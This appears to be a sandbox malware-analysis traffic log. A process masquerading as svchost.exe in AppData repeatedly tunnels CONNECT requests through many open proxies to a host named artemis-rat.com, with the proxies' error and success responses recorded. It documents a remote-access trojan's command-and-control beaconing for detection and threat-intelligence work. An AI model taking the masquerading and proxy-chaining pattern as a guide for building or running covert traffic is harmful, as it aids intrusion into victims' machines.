Mar 9, 2024 13:14:33.424882889 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3064	192.168.2.5	59372	45.128.135.1	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.271209955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3065	192.168.2.5	59371	178.62.229.28	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.271267891 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.974112988 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3066	192.168.2.5	59872	91.134.140.160	8879	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.277760029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.177222013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.271298885 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.474638939 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3067	192.168.2.5	57824	45.11.95.166	6012	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.293112993 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.145603895 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3068	192.168.2.5	59395	72.49.49.11	31034	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.320487022 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3069	192.168.2.5	58066	104.238.111.107	21453	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.421626091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.677350044 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3070	192.168.2.5	59946	162.159.241.12	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.425998926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.587371111 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3071	192.168.2.5	59871	223.113.80.158	9091	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.442287922 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.901634932 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.1 Date: Sat, 09 Mar 2024 12:15:21 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3072	192.168.2.5	59961	184.72.36.89	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.452927113 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.627206087 CET	344	IN	HTTP/1.1 403 Forbidden Date: Sat, 09 Mar 2024 12:14:33 GMT Server: Apache Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3073	192.168.2.5	59167	192.111.137.35	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.477308989 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3074	192.168.2.5	59935	107.180.89.185	49062	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.477308989 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.145767927 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.834100008 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.146444082 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.849435091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3075	192.168.2.5	59905	45.43.81.44	5691	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.477473021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.764940977 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3076	192.168.2.5	59890	8.210.80.191	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.477780104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3077	192.168.2.5	59894	218.252.244.126	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.479187012 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3078	192.168.2.5	57693	70.166.167.38	57728	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.479304075 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3079	192.168.2.5	57933	206.81.14.168	31966	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.480122089 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.639980078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3080	192.168.2.5	59944	162.120.71.11	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.491148949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3081	192.168.2.5	59891	94.30.152.172	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.502331018 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.840651035 CET	310	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3082	192.168.2.5	59889	216.9.224.113	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.506408930 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3083	192.168.2.5	59918	23.137.248.197	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.531410933 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3084	192.168.2.5	58057	198.44.255.3	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.543842077 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:33.854285002 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.24.0 Date: Sat, 09 Mar 2024 12:14:33 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3085	192.168.2.5	59934	23.137.248.197	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.545306921 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3086	192.168.2.5	59916	103.166.141.74	20074	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.572995901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3087	192.168.2.5	59915	27.65.240.157	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.589202881 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3088	192.168.2.5	59917	202.150.1.87	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.589340925 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3089	192.168.2.5	59962	122.51.123.219	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.624243975 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3090	192.168.2.5	59936	185.191.236.162	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.638638020 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.100712061 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3091	192.168.2.5	59940	103.231.78.36	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.638674021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3092	192.168.2.5	59964	8.219.179.237	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.643064022 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3093	192.168.2.5	59795	185.158.114.14	25697	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.649811029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3094	192.168.2.5	59885	43.155.130.182	15673	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.649947882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3095	192.168.2.5	59474	198.12.253.117	31131	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.681487083 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3096	192.168.2.5	59953	43.231.22.228	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.685242891 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3097	192.168.2.5	59971	192.154.246.96	9000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:33.694844007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

